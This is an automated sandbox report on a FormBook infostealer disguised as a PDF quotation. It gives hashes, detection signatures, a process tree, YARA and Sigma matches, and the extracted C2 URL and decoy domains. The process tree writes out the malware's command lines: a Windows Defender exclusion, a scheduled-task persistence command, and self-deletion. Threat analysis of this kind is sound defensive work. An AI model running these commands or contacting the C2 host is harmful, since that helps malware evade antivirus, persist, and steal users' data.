Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
QUOTATION PDF_SCAN_COPY.exe

Overview

General Information

Sample Name:QUOTATION PDF_SCAN_COPY.exe
Analysis ID:563220
MD5:5e9af5b2056e4da639a9459e3b36193c
SHA1:b779402e9a6ecbbef6b68817814991bbcade12df
SHA256:35147128936c2e79548e5c0a2bbd70cd5a29c1b01dfa1ac2515fa5becb7efa6d
Tags:exeformbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Sigma detected: Suspicius Add Task From User AppData Temp
Machine Learning detection for sample
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Powershell Defender Exclusion
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Adds a directory exclusion to Windows Defender
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • QUOTATION PDF_SCAN_COPY.exe (PID: 6844 cmdline: "C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exe" MD5: 5E9AF5B2056E4DA639A9459E3B36193C)
    • powershell.exe (PID: 4128 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KHDScDG.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 3532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 984 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KHDScDG" /XML "C:\Users\user\AppData\Local\Temp\tmp2DBB.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 3220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • QUOTATION PDF_SCAN_COPY.exe (PID: 796 cmdline: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exe MD5: 5E9AF5B2056E4DA639A9459E3B36193C)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 1716 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 4100 cmdline: /c del "C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • explorer.exe (PID: 5880 cmdline: "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.faireez.club/n2t4/"], "decoy": ["livingthroughthechaos.net", "videobuzzmedia.com", "felineformulas.com", "theorganicbees.com", "bizoeflow.com", "gtbcked.com", "immortalapenft.com", "pacherasrl.com", "defunddrip.black", "fromefarm.com", "newmedicalnetwork.com", "nikosblue.com", "kaecfu.online", "arcane-stylish.com", "7ox.info", "osamaabuzawayed.com", "noemielatour.com", "baccaratjava.com", "latinfoodandwinefestival.com", "magiclandstudios.com", "shazpe.com", "businessmanbazar.com", "lifewithkatiewright.com", "themarketingideascatalog.com", "nickbrizhoops.com", "esportsgamertv.com", "delinointeriores.com", "connotatetechnologies.net", "cybomatic.cloud", "correctmakling.site", "thammydora.com", "ageingwellhomecare.com", "fleetwoodjobshop.site", "jakulo.com", "drbaren.com", "newpointstudio.com", "yxuqamnj.com", "spiritsyncing.net", "hy963app.com", "rnp-trading-lukoil.com", "bowlesuniverse.com", "fumigacionesecouniversal.com", "vulvip.com", "heppi.pro", "preetiplease.com", "gemini-hk.icu", "allyazek24.xyz", "blackbratapparelcompany.com", "immersivenm.com", "mystoragewarehouse.com", "dvjdob.icu", "mecanicadesuelosrancagua.one", "cayugacommunitysolar.com", "parizes.site", "vpsincnas.com", "tattoo-marketplace.online", "garadapatngklgamazon.com", "signa.info", "simplegourmetpa.com", "quintanaroopt.com", "studio-goettingen.com", "brimhi.com", "fabula-glass.com", "1049hubertrd.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000000.741535276.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000B.00000000.741535276.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000B.00000000.741535276.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18839:$sqlite3step: 68 34 1C 7B E1
    • 0x1894c:$sqlite3step: 68 34 1C 7B E1
    • 0x18868:$sqlite3text: 68 38 2A 90 C5
    • 0x1898d:$sqlite3text: 68 38 2A 90 C5
    • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
    0000000B.00000002.835174756.0000000000E80000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000B.00000002.835174756.0000000000E80000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      11.0.QUOTATION PDF_SCAN_COPY.exe.400000.4.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        11.0.QUOTATION PDF_SCAN_COPY.exe.400000.4.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        11.0.QUOTATION PDF_SCAN_COPY.exe.400000.4.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17a39:$sqlite3step: 68 34 1C 7B E1
        • 0x17b4c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a68:$sqlite3text: 68 38 2A 90 C5
        • 0x17b8d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
        11.2.QUOTATION PDF_SCAN_COPY.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          11.2.QUOTATION PDF_SCAN_COPY.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 20 entries

          Sigma Overview

          System Summary

          barindex
          Sigma detected: Suspicius Add Task From User AppData Temp
          Source: Process startedAuthor: frack113: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KHDScDG" /XML "C:\Users\user\AppData\Local\Temp\tmp2DBB.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KHDScDG" /XML "C:\Users\user\AppData\Local\Temp\tmp2DBB.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exe" , ParentImage: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exe, ParentProcessId: 6844, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KHDScDG" /XML "C:\Users\user\AppData\Local\Temp\tmp2DBB.tmp, ProcessId: 984
          Sigma detected: Powershell Defender Exclusion
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KHDScDG.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KHDScDG.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exe" , ParentImage: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exe, ParentProcessId: 6844, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KHDScDG.exe, ProcessId: 4128
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KHDScDG.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KHDScDG.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exe" , ParentImage: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exe, ParentProcessId: 6844, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KHDScDG.exe, ProcessId: 4128
          Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132881008087743040.4128.DefaultAppDomain.powershell

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 0000000B.00000000.741535276.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.faireez.club/n2t4/"], "decoy": ["livingthroughthechaos.net", "videobuzzmedia.com", "felineformulas.com", "theorganicbees.com", "bizoeflow.com", "gtbcked.com", "immortalapenft.com", "pacherasrl.com", "defunddrip.black", "fromefarm.com", "newmedicalnetwork.com", "nikosblue.com", "kaecfu.online", "arcane-stylish.com", "7ox.info", "osamaabuzawayed.com", "noemielatour.com", "baccaratjava.com", "latinfoodandwinefestival.com", "magiclandstudios.com", "shazpe.com", "businessmanbazar.com", "lifewithkatiewright.com", "themarketingideascatalog.com", "nickbrizhoops.com", "esportsgamertv.com", "delinointeriores.com", "connotatetechnologies.net", "cybomatic.cloud", "correctmakling.site", "thammydora.com", "ageingwellhomecare.com", "fleetwoodjobshop.site", "jakulo.com", "drbaren.com", "newpointstudio.com", "yxuqamnj.com", "spiritsyncing.net", "hy963app.com", "rnp-trading-lukoil.com", "bowlesuniverse.com", "fumigacionesecouniversal.com", "vulvip.com", "heppi.pro", "preetiplease.com", "gemini-hk.icu", "allyazek24.xyz", "blackbratapparelcompany.com", "immersivenm.com", "mystoragewarehouse.com", "dvjdob.icu", "mecanicadesuelosrancagua.one", "cayugacommunitysolar.com", "parizes.site", "vpsincnas.com", "tattoo-marketplace.online", "garadapatngklgamazon.com", "signa.info", "simplegourmetpa.com", "quintanaroopt.com", "studio-goettingen.com", "brimhi.com", "fabula-glass.com", "1049hubertrd.com"]}
          Multi AV Scanner detection for submitted file
          Source: QUOTATION PDF_SCAN_COPY.exeVirustotal: Detection: 42%Perma Link
          Source: QUOTATION PDF_SCAN_COPY.exeMetadefender: Detection: 29%Perma Link
          Source: QUOTATION PDF_SCAN_COPY.exeReversingLabs: Detection: 32%
          Yara detected FormBook
          Source: Yara matchFile source: 11.0.QUOTATION PDF_SCAN_COPY.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.QUOTATION PDF_SCAN_COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.0.QUOTATION PDF_SCAN_COPY.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.0.QUOTATION PDF_SCAN_COPY.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.QUOTATION PDF_SCAN_COPY.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.0.QUOTATION PDF_SCAN_COPY.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.0.QUOTATION PDF_SCAN_COPY.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000000.741535276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.835174756.0000000000E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.981277393.0000000003270000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000000.775484148.000000000DADA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.980171637.0000000000950000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.741938582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.748414866.0000000003A89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000000.794471211.000000000DADA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.980875419.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.834375246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.834839904.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Roaming\KHDScDG.exeMetadefender: Detection: 29%Perma Link
          Source: C:\Users\user\AppData\Roaming\KHDScDG.exeReversingLabs: Detection: 32%
          Machine Learning detection for sample
          Source: QUOTATION PDF_SCAN_COPY.exeJoe Sandbox ML: detected
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Roaming\KHDScDG.exeJoe Sandbox ML: detected
          Source: 11.0.QUOTATION PDF_SCAN_COPY.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 11.0.QUOTATION PDF_SCAN_COPY.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 11.0.QUOTATION PDF_SCAN_COPY.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 11.2.QUOTATION PDF_SCAN_COPY.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: QUOTATION PDF_SCAN_COPY.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: QUOTATION PDF_SCAN_COPY.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: QUOTATION PDF_SCAN_COPY.exe, 0000000B.00000003.744424237.0000000000E20000.00000004.00000800.00020000.00000000.sdmp, QUOTATION PDF_SCAN_COPY.exe, 0000000B.00000002.836130531.00000000010DF000.00000040.00000800.00020000.00000000.sdmp, QUOTATION PDF_SCAN_COPY.exe, 0000000B.00000002.835752890.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, wlanext.exe, 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, wlanext.exe, 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: QUOTATION PDF_SCAN_COPY.exe, 0000000B.00000003.744424237.0000000000E20000.00000004.00000800.00020000.00000000.sdmp, QUOTATION PDF_SCAN_COPY.exe, 0000000B.00000002.836130531.00000000010DF000.00000040.00000800.00020000.00000000.sdmp, QUOTATION PDF_SCAN_COPY.exe, 0000000B.00000002.835752890.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, wlanext.exe, wlanext.exe, 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, wlanext.exe, 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wlanext.pdb source: QUOTATION PDF_SCAN_COPY.exe, 0000000B.00000002.838690431.00000000030C0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: zrsmwUxCy\src\obj\Debug\Regist.pdb source: QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.745031177.0000000000F2D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\lzrsmwUxCy\src\obj\Debug\Regist.pdb source: QUOTATION PDF_SCAN_COPY.exe, KHDScDG.exe.1.dr
          Source: Binary string: wlanext.pdbGCTL source: QUOTATION PDF_SCAN_COPY.exe, 0000000B.00000002.838690431.00000000030C0000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeCode function: 4x nop then pop edi11_2_00416CDE
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeCode function: 4x nop then pop edi11_2_00417D51
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop edi19_2_03287D51
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop edi19_2_03286CDE

          Networking

          barindex
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.faireez.club/n2t4/
          Source: explorer.exe, 0000001A.00000002.976108228.00000000080F2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000000.948419680.00000000080F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
          Source: QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.746575972.0000000002B82000.00000004.00000800.00020000.00000000.sdmp, QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.745531520.0000000002A81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.745478312.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.750662294.0000000006BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 11.0.QUOTATION PDF_SCAN_COPY.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.QUOTATION PDF_SCAN_COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.0.QUOTATION PDF_SCAN_COPY.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.0.QUOTATION PDF_SCAN_COPY.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.QUOTATION PDF_SCAN_COPY.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.0.QUOTATION PDF_SCAN_COPY.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.0.QUOTATION PDF_SCAN_COPY.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000000.741535276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.835174756.0000000000E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
